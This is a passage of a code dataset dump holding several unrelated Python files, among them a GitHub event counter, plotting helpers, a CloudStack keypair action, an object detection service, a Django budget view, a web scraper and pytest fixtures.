#往表中添加信息\n                        connector.execute('INSERT INTO HOMEWORK(actor_login, event, user_repo) VALUES(?,?,?)',data)\n                        connector.commit()\n        connector.close()\n        print(0)\n\nclass Run:\n    def __init__(self):\n        self.parser = argparse.ArgumentParser()\n        self.argInit()\n        self.data = None\n        self.operation()\n\n    def argInit(self):\n        self.parser.add_argument('-i', '--init')\n        self.parser.add_argument('-u', '--user')\n        self.parser.add_argument('-r', '--repo')\n        self.parser.add_argument('-e', '--event')\n\n    def operation(self):\n        if self.parser.parse_args().init:\n            self.data = Data(self.parser.parse_args().init, 1)\n            return 0\n        else:\n            if self.data is None:\n                self.data = Data()\n            if self.parser.parse_args().event:\n                if self.parser.parse_args().user:\n                    if self.parser.parse_args().repo:\n                        output(type=2, user=self.parser.parse_args().user, event=self.parser.parse_args().event,repo=self.parser.parse_args().repo)\n                    else:\n                        output(type=0,user=self.parser.parse_args().user,event=self.parser.parse_args().event)\n                elif self.parser.parse_args().repo:\n                    output(type=1,repo=self.parser.parse_args().repo,event=self.parser.parse_args().event)\n                else:\n                    raise RuntimeError('Error: Argument -u or -r is required.')\n            else:\n                raise RuntimeError('Error: Argument -e is required.')\n\ndef output(type, user=\"\", event=\"\", repo=\"\"):\n    connector = sqlite3.connect('Information.db')\n    if type == 0:\n        cursor = connector.execute('SELECT * FROM HOMEWORK WHERE event=? 
AND actor_login=?',(event,user))\n elif type == 1:\n cursor = connector.execute('SELECT * FROM HOMEWORK WHERE event=? AND user_repo=?',(event,repo)) \n else:\n cursor = connector.execute('SELECT * FROM HOMEWORK WHERE event=? AND user_repo=? AND actor_login=?', (event, repo, user)) \n print(len(list(cursor))) \n connector.close()\n\nif __name__ == '__main__':\n a = Run()\n ","sub_path":"GHAnalysis_3.0.py","file_name":"GHAnalysis_3.0.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"494085494","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 23 14:52:21 2019\n\n@author: yaqianzhang\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nlegends=['-o','.-','-*','-<','-^','-v','-.*','-o','.-','*-','<-','-o','.-']\ndef plot_cost(logger_list,names,mode=None):\n# params = {'legend.fontsize': 20,\n# 'axes.titlesize': 24,\n# 'axes.labelsize': 20,\n# 'lines.linewidth' : 3,\n# 'lines.markersize' : 10,\n# 'xtick.labelsize': 16,\n# 'ytick.labelsize': 16}\n# plt.rcParams.update(params)\n if(mode ==\"Strong\"):\n title_str = \"Strong Students\"\n elif(mode == \"Weak\"):\n title_str = \"Weak Students\"\n elif(mode==\"Gaussian\"):\n title_str=\"Data with Gaussian Distribution\"\n else:\n title_str=\"Data with Uniform Distribution\"\n\n \n algo_num = len(logger_list)\n legend_name = names\n \n #legends2=['-.o','.-.','-.*','-<','-^','-v','-.*','-o','.-','*-','<-','-o','.-']\n \n \n\n plt.figure(figsize=(5,4))#figsize=(8,6)\n ax = plt.subplot(111)\n for i in range(algo_num):\n #rewards = pfmc_to_reward(logger_list[i].arr_pfmc,threshold,pfmc_max)\n rewards = logger_list[i].arr_rwd\n time_reward = np.mean(rewards,axis=0)\n plt.plot(time_reward,legends[i])\n\n \n\n \n ax.legend(legend_name[:algo_num],loc='center right', bbox_to_anchor=(1, 0.55),\n ncol=2, fancybox=True, shadow=True)\n #plt.legend(legend_name[:num])\n plt.xlabel(\"Time step\")\n plt.ylabel(\"Cost\")\n #plt.yticks(np.arange(3), ('10^1', '10^0', '10^-1'))\n plt.title(title_str)\n #plt.ylim(0,1)\n \n fig = plt.gcf()\n #fig.set_size_inches(18.5, 10.5)\n fig.savefig('pic/'+title_str+'.png', dpi=600)\n plt.show()\n\n# \n ##################### action quality\n\n \ndef plot_arr_pfmc(logger_list,legend_name,mode=None):\n if(mode ==\"Strong\"):\n title_str = \"Strong Students\"\n \n elif(mode == \"Weak\"):\n title_str = \"Weak Students\"\n else:\n title_str=\"\"\n \n algo_num = len(logger_list)\n\n# \n plt.figure(figsize=(5,4))\n ax=plt.subplot(111)\n \n for i in range(algo_num):\n sr = logger_list[i].arr_pfmc\n time_match = np.mean(sr,axis = 0)\n plt.plot(time_match,legends[i])\n #temp_name.append(names[i]+' For WS')\n if(mode == \"Weak\"):\n plt.legend(legend_name[:algo_num],loc='lower right', bbox_to_anchor=(1, 0.7),\n ncol=2, fancybox=True, shadow=True)\n else:\n plt.legend(legend_name[:algo_num],loc='lower right', bbox_to_anchor=(1, 0),\n ncol=2, fancybox=True, shadow=True)\n #plt.ylabel(\"Percieved Difficulty\")\n plt.ylim(0,1)\n #plt.yticks([0, 0.5,1.0], [\"\",'',''])#\n plt.yticks([0, 0.5,1.0],[\"Hard\", \"Suitable\",\"Easy\"])\n plt.title(title_str)\n \n plt.xlabel(\"Time step\")\n fig = plt.gcf()\n #fig.set_size_inches(18.5, 10.5)\n fig.savefig('pic/'+title_str+'.png', dpi=600)\n \n \n\n \n","sub_path":"Difficulty_Adaptation/Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"129670993","text":"#!/usr/bin/env python\n\nfrom lib.cloudstack import CloudStackAPI\n\n__all__ = [\n 'SSHKeyPairCreate'\n]\n\n\nclass SSHKeyPairCreate(CloudStackAPI):\n def run(self, url, apikey, secretkey, name, project_id):\n cs = self.get_client(url, apikey, secretkey)\n\n return cs.createSSHKeyPair(name=name, projectid=project_id)\n","sub_path":"actions/sshkeypair_create.py","file_name":"sshkeypair_create.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"135079353","text":"# Python module imports.\nimport os\n\n# relax module imports.\nfrom auto_analyses.dauvergne_protocol import dAuvergne_protocol\nfrom pipe_control import pipes\n\n# The results dir.\nvar = 'result_10'\nresults_dir = os.getcwd() + os.sep + var\n\n# Load the state with setup.\nstate.load(state=var+'_ini.bz2', dir=results_dir, force=True)\n\n# Read the pipe info\npipe.display()\npipe_name = pipes.cdp_name()\npipe_bundle = pipes.get_bundle(pipe_name)\n\n# Analysis variables.\n#####################\n# The diffusion model. Standard is 'Fully automated', which means: DIFF_MODEL=['local_tm', 'sphere', 'prolate', 'oblate', 'ellipsoid', 'final']\n# 'local_tm', 'sphere', ''prolate', 'oblate', 'ellipsoid', or 'final'\n#DIFF_MODEL = ['local_tm', 'sphere', 'prolate', 'oblate', 'ellipsoid', 'final']\nDIFF_MODEL = ['oblate']\n\n# The grid search size (the number of increments per dimension).\nGRID_INC = 11\n\n# The number of Monte Carlo simulations to be used for error analysis at the end of the analysis.\n# This has no influence in Model 1-5\nMC_NUM = 0\n\n# The maximum number of iterations for the global iteration. \n# Set to None, then the algorithm iterates until convergence.\nMAX_ITER = 20\n\n# Run protocol\ndAuvergne_protocol(pipe_name=pipe_name, pipe_bundle=pipe_bundle, \n results_dir=results_dir,\n write_results_dir=results_dir,\n diff_model=DIFF_MODEL,\n grid_inc=GRID_INC,\n mc_sim_num=MC_NUM,\n max_iter=MAX_ITER)\n","sub_path":"13_Model_4_IV_oblate.py","file_name":"13_Model_4_IV_oblate.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"328637610","text":"class Settings():\r\n\t#class for saving new settings of our game \r\n\t\r\n\tdef __init__(self):\r\n\t\t#initializing settings \r\n\t\t#screen parametrs\r\n\t\tself.screen_width = 1200\r\n\t\tself.screen_height = 600\r\n\t\tself.bg_color = (105,105,105)\r\n\t\t\r\n","sub_path":"Alien_Invasion/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242648400","text":"#!/usr/bin/env python3\n\nimport sys\nfrom operator import itemgetter\nfrom collections import defaultdict\nimport ast\n\nfinal_data = []\n\nfor line in sys.stdin:\n\tif line:\n\t\tfinal_data.append(ast.literal_eval(line))\n\nsorted_fd_list = sorted(final_data,key=itemgetter(1), reverse=True)\n\nd = defaultdict(float)\n\nfor x, y in sorted_fd_list:\n d[x] += float(y)\n\nfinal_list = [(x, round(y, 2)) for x, y in d.items()]\n\nsorted_final_list = sorted(final_list,key=itemgetter(1), reverse=True)\n\nfor k,v in sorted_final_list[0:10]:\n\tprint(k)\n\t\n","sub_path":"Hadoop/trigram_reducer_2.py","file_name":"trigram_reducer_2.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"200218252","text":"#!/usr/bin/env python\n# Copyright 2016 IBM Corp.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import nested_scopes, generators, division, absolute_import, \\\n with_statement, print_function, unicode_literals\nimport sys\nimport os.path\nfrom orderedattrdict import AttrDict\n\nfrom lib.inventory import Inventory\nfrom lib.logger import Logger\nfrom get_mgmt_switch_config import GetMgmtSwitchConfig\nfrom get_dhcp_lease_info import GetDhcpLeases\nfrom lib.logger import Logger\n\n\nclass InventoryAddIpmi(object):\n def __init__(self, dhcp_leases_file, log_level, inv_file, cfg_file):\n log = Logger(__file__)\n if log_level is not None:\n log.set_level(log_level)\n\n dhcp_leases = GetDhcpLeases(dhcp_leases_file, log_level)\n dhcp_mac_ip = dhcp_leases.get_mac_ip()\n\n inv = Inventory(log_level, inv_file, cfg_file)\n mgmt_switch_config = GetMgmtSwitchConfig(log_level)\n mgmt_sw_cfg = AttrDict()\n for rack, ipv4 in inv.yield_mgmt_rack_ipv4():\n mgmt_sw_cfg[rack] = mgmt_switch_config.get_port_mac(rack, ipv4)\n\n inv.create_nodes(dhcp_mac_ip, mgmt_sw_cfg)\n\n for rack, mac, ip in inv.yield_node_ipmi():\n log.info(\n 'IPMI node detected - Rack: %s - MAC: %s - IP: %s' %\n (rack, mac, ip))\n\nif __name__ == '__main__':\n \"\"\"\n Arg1: config file\n Arg2: inventory file\n Arg3: DHCP leases file\n Arg4: log level\n \"\"\"\n log = Logger(__file__)\n\n ARGV_MAX = 5\n argv_count = len(sys.argv)\n if argv_count > ARGV_MAX:\n try:\n raise Exception()\n except:\n log.error('Invalid argument count')\n exit(1)\n\n cfg_file = sys.argv[1]\n inv_file = sys.argv[2]\n dhcp_leases_file = sys.argv[3]\n if len(sys.argv) == ARGV_MAX:\n log_level = sys.argv[4]\n else:\n log_level = None\n\n ipmi_data = InventoryAddIpmi(\n dhcp_leases_file, log_level, inv_file, cfg_file)\n","sub_path":"scripts/python/inv_add_ipmi_ports.py","file_name":"inv_add_ipmi_ports.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"516485050","text":"import datetime as dt\nimport copy\nfrom accounts.data.userlevel import UserLevel\nfrom accounts.data.userlevel import AdminLevelType\nfrom accounts.data.userlevel import AdminLevelStatusType\nfrom accounts.databases.database import Database\nfrom accounts.repositories.repository import Repository\nfrom accounts.databases.sqlresult import SQLResult\n\n\nclass AdministratorLevelRepository(Repository):\n def __init__(self, **kwargs):\n kwargs[\"name\"] = 'tbl_administration_level'\n super().__init__(**kwargs)\n if self.Database is not None:\n self.Database.Execute(\n \"CREATE TABLE IF NOT EXISTS {0} (user_uuid text primary key, admin_level text, status int, expired_date text,\"\n \" date_assigned text, date_created text(20))\".format(self.Name))\n self.Database.Commit()\n\n def Create(self, user_uuid: str, level: UserLevel) -> UserLevel:\n result = None\n if self.Exists(user_uuid) is not True:\n level.DateCreated = 
dt.datetime.now()\n            expired = str(level.Expired.timestamp())\n            assigned_date = str(level.Assigned.timestamp())\n            date_created = str(level.DateCreated.timestamp())\n            stmt = self.Database.Execute(\n                \"INSERT INTO {0} (user_uuid, admin_level,status,expired_date,date_assigned,date_created) \"\n                \"VALUES (?,?,?,?,?,?)\".format(self.Name),\n                (user_uuid, level.Level, level.Status, expired, assigned_date, date_created))\n            result = copy.deepcopy(level)\n            self.Database.Commit()\n        return result\n\n    def ParseRecord(self, record:SQLResult):\n        level:UserLevel = None\n        if record is not None:\n            level:UserLevel = UserLevel(user_uuid= record.Get('user_uuid'), status= record.Get('status'))\n            level.DateCreated = record.Get('date_created')\n            level.Assigned = record.Get('date_assigned')\n            level.Expired = record.Get('expired_date')\n            level.Level = record.Get('admin_level')\n        return level\n\n\n    def IsAdmin(self, user_uid: str) -> bool:\n        status = False\n        if type(user_uid) == str:\n            user_level:UserLevel = self.Get(user_uid)\n            if user_level is not None:\n                if(user_level.Level == AdminLevelType.SITE_ADMINISTRATION_LEVEL) or\\\n                        (user_level.Level == AdminLevelType.DEVELOPER_ADMINISTRATOR_LEVEL):\n                    status = True\n        return status\n\n    def Get(self, user_uuid:str) -> UserLevel:\n        level: UserLevel = None\n\n        if type(user_uuid) == str:\n            stmt = self.Database.Execute(\"SELECT * FROM {0} WHERE (user_uuid =?)\".format(self.Name), (user_uuid,))\n            if stmt.RowCount > 0:\n                record = stmt.Next\n                level: UserLevel = self.ParseRecord(record)\n        return level\n\n    def Update(self,user_uuid:str, user_level: UserLevel) -> bool:\n        status = False\n        if (isinstance(user_level, UserLevel) is True) and (self.Exists(user_uuid) is True):\n\n            self.Database.Execute(\"UPDATE {0} SET admin_level=?, date_assigned=?, status=?, expired_date=? 
where (user_uuid=?)\".format(self.Name),\n (user_level.Level, str(user_level.Assigned.timestamp()), status, str(user_level.Expired.timestamp()), user_uuid))\n self.Database.Commit()\n status = True\n return status\n\n def Exists(self, user_uuid: str):\n status = False\n if type(user_uuid) == str:\n stmt = self.Database.Execute(\"SELECT * FROM {0} WHERE (user_uuid=?)\".format(self.Name), (user_uuid,))\n if stmt is not None:\n if stmt.RowCount > 0:\n status = True\n return status\n\n\nif __name__ == \"__main__\":\n repo = AdministratorLevelRepository(db=Database(name=\"../server/dbtest.db\"))\n\n level = UserLevel(user_uuid=\"9087890876\", status=AdminLevelStatusType.NORMAL,\n admin_level=AdminLevelType.DEVELOPER_ADMINISTRATOR_LEVEL)\n result = repo.Create(\"9087890876\", level)\n print(result)\n\n repo.Database.Close()\n","sub_path":"accounts/repositories/administrationlevelrepository.py","file_name":"administrationlevelrepository.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144218677","text":"\"\"\"Pytest fixtures for main test suite.\"\"\"\nimport os\n\nimport pytest\n\nfrom pycounter import csvhelper\nfrom pycounter import report\nimport pycounter.sushi\n\n\ndef parsedata(filename):\n \"\"\"Helper function returns a report from a filename relative to data directory.\"\"\"\n return report.parse(os.path.join(os.path.dirname(__file__), \"data\", filename))\n\n\n@pytest.fixture(\n params=[\"csvC4JR1\", \"C4JR1.csv\", \"simpleJR1.csv\", \"C4JR1_bad.csv\", \"C4JR1GOA.csv\"]\n)\ndef csv_jr1_report(request):\n \"\"\"Various CSV format JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"simpleJR1.tsv\", \"tsvC4JR1\"])\ndef tsv_jr1(request):\n \"\"\"TSV file\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"csvC4JR1\", \"C4JR1.csv\", \"simpleJR1.csv\", \"C4JR1_bad.csv\"])\ndef csv_jr1_report_std(request):\n \"\"\"Standard (non-GOA) JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"csvC4JR1\", \"C4JR1.csv\", \"simpleJR1.csv\"])\ndef csv_jr1_report_common_data(request):\n \"\"\"JR1 reports with shared common data we can make assertions about.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"csvC4JR1\", \"C4JR1.csv\", \"C4JR1_bad.csv\"])\ndef csv_jr1_r4_report(request):\n \"\"\"Revision 4 JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"JR1.xlsx\", \"JR1_bad.xlsx\", \"xlsxJR1\"])\ndef jr1_report_xlsx(request):\n \"\"\"Excel formatted JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\ndef parse_sushi_file(filename):\n \"\"\"Turn SUSHI data file into a report.\"\"\"\n # pylint: disable= protected-access\n with open(os.path.join(os.path.dirname(__file__), \"data\", filename)) as datafile:\n return pycounter.sushi.raw_to_full(datafile.read())\n\n\n@pytest.fixture(\n params=[\n \"sushi_simple.xml\",\n \"sushi_simple_no_customer.xml\",\n \"sushi_simple_br1.xml\",\n \"sushi_simple_db1.xml\",\n \"sushi_db1_missing_record_view.xml\",\n ]\n)\ndef sushi_report_all(request):\n \"\"\"Report from SUSHI, shared common data.\"\"\"\n return parse_sushi_file(request.param)\n\n\n@pytest.fixture(\n params=[\n \"sushi_simple.xml\",\n \"sushi_simple_br1.xml\",\n \"sushi_simple_db1.xml\",\n \"sushi_db1_missing_record_view.xml\",\n ]\n)\ndef sushi_report_with_customer(request):\n \"\"\"Report from SUSHI, shared common data with customer set.\"\"\"\n return 
parse_sushi_file(request.param)\n\n\n@pytest.fixture(params=[\"sushi_simple_no_customer.xml\"])\ndef sushi_report_no_customer(request):\n \"\"\"Report from SUSHI, shared common data with customer not set.\"\"\"\n return parse_sushi_file(request.param)\n\n\n@pytest.fixture(params=[\"sushi_simple.xml\", \"sushi_simple_no_customer.xml\"])\ndef sushi_report_jr1(request):\n \"\"\"Report from SUSHI, shared common data, JR1 only.\"\"\"\n return parse_sushi_file(request.param)\n\n\n@pytest.fixture(\n params=[\n \"C4BR1.tsv\",\n \"C4DB1.tsv\",\n \"C4JR1.csv\",\n \"C4BR2.tsv\",\n \"C4DB2.tsv\",\n \"C4JR1mul.csv\",\n ]\n)\ndef common_output(request):\n \"\"\"Common data for output.\"\"\"\n delim = {\"tsv\": \"\\t\", \"csv\": \",\"}[request.param.split(\".\")[1]]\n filename = os.path.join(os.path.dirname(__file__), \"data\", request.param)\n with csvhelper.UnicodeReader(filename, delimiter=delim) as report_reader:\n content = list(report_reader)\n return parsedata(request.param).as_generic(), content\n\n\n@pytest.fixture(params=[\"simpleBR1.csv\", \"simpleBR2.csv\"])\ndef br_c1(request):\n \"\"\"Version 1 (COUNTER 3) book reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"C4BR2.tsv\", \"C4BR1.tsv\", \"simpleBR1.csv\", \"simpleBR2.csv\"])\ndef all_book_reports(request):\n \"\"\"All book reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"C4BR1.tsv\", \"simpleJR1.tsv\"])\ndef report_file_output(request):\n \"\"\"Reports with their expected output.\"\"\"\n rpt = parsedata(request.param)\n with open(\n os.path.join(os.path.dirname(__file__), \"data\", request.param), \"rb\"\n ) as f:\n expected_data = f.read()\n return rpt, expected_data\n\n\n@pytest.fixture(params=[\"C4DB1.tsv\", \"C4DB2.tsv\"])\ndef db_report(request):\n \"\"\"All C4 database reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture\ndef br3_report():\n \"\"\"Book report 3 (turnaways).\"\"\"\n return parsedata(\"C4BR3.csv\")\n\n\n@pytest.fixture\ndef jr2_report():\n \"\"\"Journal report 2 (turnaways).\"\"\"\n return parsedata(\"C4JR2.csv\")\n","sub_path":"pycounter/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330091027","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nimport numpy as np\nimport os\nfrom util import s3\nfrom PIL import Image\nimport tensorflow as tf\nfrom object_detection.utils import visualization_utils as vis_util\nfrom stylelens_feature.feature_extract import ExtractFeature\nfrom bluelens_log import Logging\n\nimport io\nfrom util import label_map_util\n\nTMP_CROP_IMG_FILE = './tmp.jpg'\n\nNUM_CLASSES = 2\n\nAWS_BUCKET = 'bluelens-style-model'\nAWS_BUCKET_FOLDER = 'object_detection'\nMODEL_TYPE = 'top_full'\nAWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nREDIS_SERVER = os.environ['REDIS_SERVER']\nREDIS_PASSWORD = os.environ['REDIS_PASSWORD']\nRELEASE_MODE = os.environ['RELEASE_MODE']\nFEATURE_GRPC_HOST = os.environ['FEATURE_GRPC_HOST']\nFEATURE_GRPC_PORT = os.environ['FEATURE_GRPC_PORT']\nOD_GRPC_HOST = os.environ['FEATURE_GRPC_HOST']\nOD_GRPC_PORT = os.environ['FEATURE_GRPC_PORT']\nOD_SCORE_MIN = float(os.environ['OD_SCORE_MIN'])\nGPU_NUM = os.environ['GPU_NUM']\nGPU = '/device:GPU:' + GPU_NUM\n\nMODEL_FILE = 'frozen_inference_graph.pb'\nLABEL_MAP_FILE = 'label_map.pbtxt'\noptions = {\n 'REDIS_SERVER': REDIS_SERVER,\n 
'REDIS_PASSWORD': REDIS_PASSWORD\n}\nlog = Logging(options, tag='bl-detect:AllObjectDetect')\nstorage = s3.S3(AWS_ACCESS_KEY, AWS_SECRET_ACCESS_KEY)\n\nclass TopFullObjectDetect(object):\n def __init__(self):\n label_map_file = self.load_labelemap()\n label_map = label_map_util.load_labelmap(label_map_file)\n log.debug(label_map)\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,\n use_display_name=True)\n self.__category_index = label_map_util.create_category_index(categories)\n self.__detection_graph = tf.Graph()\n self.__feature_extractor = ExtractFeature(use_gpu=True)\n model_file = self.load_model()\n with self.__detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(model_file, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n with tf.device(GPU):\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.__sess = tf.Session(config=config, graph=self.__detection_graph)\n\n log.info('_init_ done')\n\n def load_labelemap(self):\n log.info('load_labelmap')\n file = os.path.join(os.getcwd(), LABEL_MAP_FILE)\n key = os.path.join(AWS_BUCKET_FOLDER, RELEASE_MODE, MODEL_TYPE, LABEL_MAP_FILE)\n print(key)\n try:\n return storage.download_file_from_bucket(AWS_BUCKET, file, key)\n except:\n log.error('download error')\n return None\n\n def load_model(self):\n log.info('load_model')\n file = os.path.join(os.getcwd(), MODEL_FILE)\n key = os.path.join(AWS_BUCKET_FOLDER, RELEASE_MODE, MODEL_TYPE, MODEL_FILE)\n print(key)\n try:\n return storage.download_file_from_bucket(AWS_BUCKET, file, key)\n except:\n log.error('download error')\n return None\n\n def detect(self, image_bytes):\n\n image_data = Image.open(io.BytesIO(image_bytes))\n image_np = self.load_image_into_numpy_array(image_data)\n\n show_box = False\n out_image, boxes, scores, classes, num_detections = self.detect_objects(image_np, self.__sess, self.__detection_graph, show_box)\n\n out_boxes = self.take_object(\n out_image,\n np.squeeze(boxes),\n np.squeeze(scores),\n np.squeeze(classes).astype(np.int32))\n\n # log.debug(out_boxes)\n return out_boxes\n\n def take_object(self, image_np, boxes, scores, classes):\n max_boxes_to_save = 3\n taken_boxes = []\n if not max_boxes_to_save:\n max_boxes_to_save = boxes.shape[0]\n for i in range(min(max_boxes_to_save, boxes.shape[0])):\n if scores is None or scores[i] > OD_SCORE_MIN:\n print(scores[i])\n if classes[i] in self.__category_index.keys():\n class_name = self.__category_index[classes[i]]['name']\n class_code = str(self.__category_index[classes[i]]['id'])\n else:\n class_name = 'na'\n class_code = 'na'\n ymin, xmin, ymax, xmax = tuple(boxes[i].tolist())\n\n use_normalized_coordinates = True\n image_pil = Image.fromarray(np.uint8(image_np)).convert('RGB')\n\n left, right, top, bottom = self.crop_bounding_box(\n image_pil,\n ymin,\n xmin,\n ymax,\n xmax,\n use_normalized_coordinates=use_normalized_coordinates)\n\n feature_vector = self.extract_feature(image_pil, left, right, top, bottom)\n item = {}\n\n item['box'] = [left, right, top, bottom]\n item['class_name'] = class_name\n #class_code==1(top), class_code==2(full)\n if class_code == '1':\n item['class_code'] = '1'\n elif class_code == '2':\n item['class_code'] = '3'\n else:\n item['class_code'] = class_code\n item['score'] = scores[i]\n item['feature'] = feature_vector\n taken_boxes.append(item)\n return taken_boxes\n\n def extract_feature(self, image, 
left, right, top, bottom):\n area = (left, top, left + abs(left-right), top + abs(bottom-top))\n cropped_img = image.crop(area)\n cropped_img.save(TMP_CROP_IMG_FILE)\n # cimage = io.BytesIO()\n # cropped_img.save(cimage, format='JPEG')\n # cimage.seek(0) # rewind to the start\n # cimage = Image.open(cimage)\n feature = self.__feature_extractor.extract_feature(TMP_CROP_IMG_FILE)\n return feature\n\n def load_image_into_numpy_array(self, image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n def crop_bounding_box(self,\n image,\n ymin,\n xmin,\n ymax,\n xmax,\n use_normalized_coordinates=True):\n im_width, im_height = image.size\n # image.show()\n if use_normalized_coordinates:\n (left, right, top, bottom) = (xmin * im_width, xmax * im_width,\n ymin * im_height, ymax * im_height)\n else:\n (left, right, top, bottom) = (xmin, xmax, ymin, ymax)\n\n return left, right, top, bottom\n\n def detect_objects(self, image_np, sess, detection_graph, show_box=True):\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n\n # Each box represents a part of the image where a particular object was detected.\n boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n scores = detection_graph.get_tensor_by_name('detection_scores:0')\n classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n # Actual detection.\n (boxes, scores, classes, num_detections) = sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n\n if show_box:\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n self.__category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=3,\n min_score_thresh=.05,\n line_thickness=8)\n # print(image_np)\n return image_np, boxes, scores, classes, num_detections\n","sub_path":"grpc/object_detect_top_full.py","file_name":"object_detect_top_full.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520906412","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom bs4 import re\n\nhtml = urlopen(\"http://www.chemistwarehouse.com.au/Shop-Online/587/Swisse\")\nbsObj = BeautifulSoup(html,\"html.parser\")\n#print(bsObj.prettify())\n#nameList = bsObj.findAll(\"span\",{\"class\":\"Price\"})\na_tags = bsObj.findAll(\"a\",{\"href\":re.compile(\"\\/buy\\/[0-9]*\\/[a-zA-Z0-9\\-]*\")})\nfor a in a_tags:\n print(a[\"title\"])\n price_tags = a.findAll(\"span\",{\"class\":\"Price\"})\n for price in price_tags:\n if(price.get_text()):\n print(price.get_text().strip(\" \\t\\n\\r\"))\n \n","sub_path":"code/python/findAll.py","file_name":"findAll.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"521167440","text":"import json\nimport re\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.forms import 
modelform_factory\nfrom django.http import Http404, HttpResponseRedirect, HttpResponseBadRequest, HttpResponseForbidden, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.db.models import Sum\n\nfrom cashflow import dauth\nfrom budget import models as budgetModels\nfrom expenses import models\n\ndef budget_overview(request):\n if request.method == 'GET':\n cost_centres = budgetModels.CostCentre.objects.order_by('name')\n budget_lines = budgetModels.BudgetLine.objects.order_by('name')\n expense_parts= models.ExpensePart.objects\n committees = {}\n for committee in budgetModels.Committee.objects.filter(id=55).order_by('name'):\n committees[committee.id] = {\n 'name': committee.name,\n 'cost_centres': {}\n }\n\n for cost_centre in cost_centres:\n committees[committee.id]['cost_centres'][cost_centre.id] = {\n 'name': cost_centre.name,\n 'budget_lines': {}\n }\n\n for budget_line in budget_lines:\n committees[committee.id]['cost_centres'][cost_centre.id]['budget_lines'][budget_line.id] = {\n 'name': budget_line.name,\n 'amount': float(budget_line.amount),\n 'spent': float(expense_parts.filter(budget_line=budget_line.id).aggregate(Sum('amount'))['amount__sum'] or 0)\n }\n\n if len(dauth.get_permissions(request.user)) > 0:\n return render(request, 'budget/overview.html', {\n 'committees': committees\n })\n else:\n raise Http404()\n","sub_path":"budget/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564570370","text":"# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory\n#\n# Licensed under the Apache 